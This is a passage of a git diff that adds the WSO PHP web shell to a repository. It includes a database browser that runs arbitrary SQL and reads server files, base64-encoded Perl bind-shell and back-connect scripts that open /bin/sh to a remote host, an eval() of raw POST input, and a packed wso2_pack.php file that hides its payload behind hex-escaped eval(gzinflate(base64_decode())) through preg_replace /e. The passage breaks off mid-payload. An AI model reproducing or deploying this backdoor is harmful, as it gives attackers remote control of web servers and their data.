+                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
+                    if(f.p1) f.p1.value='';
+                    if(f.p2) f.p2.value='';
+                    if(f.p3) f.p3.value='';
+                }
+            }
+			function st(t,l) {
+				d.sf.p1.value = 'select';
+				d.sf.p2.value = t;
+                if(l && d.sf.p3) d.sf.p3.value = l;
+				d.sf.submit();
+			}
+			function is() {
+				for(i=0;i<d.sf.elements['tbl[]'].length;++i)
+					d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
+			}
+		</script>";
+	if(isset($db) && $db->link){
+		echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
+			if(!empty($_POST['sql_base'])){
+				$db->selectdb($_POST['sql_base']);
+				echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
+				$tbls_res = $db->listTables();
+				while($item = $db->fetch($tbls_res)) {
+					list($key, $value) = each($item);
+                    if(!empty($_POST['sql_count']))
+                        $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
+					$value = htmlspecialchars($value);
+					echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>";
+				}
+				echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
+				if(@$_POST['p1'] == 'select') {
+					$_POST['p1'] = 'query';
+                    $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
+					$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
+					$num = $db->fetch();
+					$pages = ceil($num['n'] / 30);
+                    echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
+                    echo " of $pages";
+                    if($_POST['p3'] > 1)
+                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>";
+                    if($_POST['p3'] < $pages)
+                        echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>";
+                    $_POST['p3']--;
+					if($_POST['type']=='pgsql')
+						$_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
+					else
+						$_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
+					echo "<br><br>";
+				}
+				if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
+					$db->query(@$_POST['p2']);
+					if($db->res !== false) {
+						$title = false;
+						echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
+						$line = 1;
+						while($item = $db->fetch())	{
+							if(!$title)	{
+								echo '<tr>';
+								foreach($item as $key => $value)
+									echo '<th>'.$key.'</th>';
+								reset($item);
+								$title=true;
+								echo '</tr><tr>';
+								$line = 2;
+							}
+							echo '<tr class="l'.$line.'">';
+							$line = $line==1?2:1;
+							foreach($item as $key => $value) {
+								if($value == null)
+									echo '<td><i>null</i></td>';
+								else
+									echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
+							}
+							echo '</tr>';
+						}
+						echo '</table>';
+					} else {
+						echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
+					}
+				}
+				echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
+                if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile'))
+                    echo htmlspecialchars($_POST['p2']);
+                echo "</textarea><br/><input type=submit value='Execute'>";
+				echo "</td></tr>";
+			}
+			echo "</table></form><br/>";
+            if($_POST['type']=='mysql') {
+                $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
+                if($db->fetch())
+                    echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
+            }
+			if(@$_POST['p1'] == 'loadfile') {
+				$file = $db->loadFile($_POST['p2']);
+				echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
+			}
+	} else {
+        echo htmlspecialchars($db->error());
+    }
+	echo '</div>';
+	wsoFooter();
+}
+function actionNetwork() {
+	wsoHeader();
+	$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
+	$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
+	echo "<h1>Network tools</h1><div class=content>
+	<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
+	<span>Bind port to /bin/sh [perl]</span><br/>
+	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
+	</form>
+	<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
+	<span>Back-connect  [perl]</span><br/>
+	Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
+	</form><br>";
+	if(isset($_POST['p1'])) {
+		function cf($f,$t) {
+			$w = @fopen($f,"w") or @function_exists('file_put_contents');
+			if($w){
+				@fwrite($w,@base64_decode($t));
+				@fclose($w);
+			}
+		}
+		if($_POST['p1'] == 'bpp') {
+			cf("/tmp/bp.pl",$bind_port_p);
+			$out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";
+            unlink("/tmp/bp.pl");
+		}
+		if($_POST['p1'] == 'bcp') {
+			cf("/tmp/bc.pl",$back_connect_p);
+			$out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
+            sleep(1);
+			echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";
+            unlink("/tmp/bc.pl");
+		}
+	}
+	echo '</div>';
+	wsoFooter();
+}
+function actionRC() {
+	if(!@$_POST['p1']) {
+		$a = array(
+			"uname" => php_uname(),
+			"php_version" => phpversion(),
+			"wso_version" => WSO_VERSION,
+			"safemode" => @ini_get('safe_mode')
+		);
+		echo serialize($a);
+	} else {
+		eval($_POST['p1']);
+	}
+}
+if( empty($_POST['a']) )
+	if(isset($default_action) && function_exists('action' . $default_action))
+		$_POST['a'] = $default_action;
+	else
+		$_POST['a'] = 'SecInfo';
+if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
+	call_user_func('action' . $_POST['a']);
+exit;
diff --git a/php/wso/wso2_pack.php b/php/wso/wso2_pack.php
new file mode 100644
index 00000000..8067f5f5
--- /dev/null
+++ b/php/wso/wso2_pack.php
@@ -0,0 +1,7 @@
+<?php
+$auth_pass = "63a9f0ea7bb98050796b649e85481845";
+$color = "#df5";
+$default_action = 'FilesMan';
+$default_use_ajax = true;
+$default_charset = 'Windows-1251';
+preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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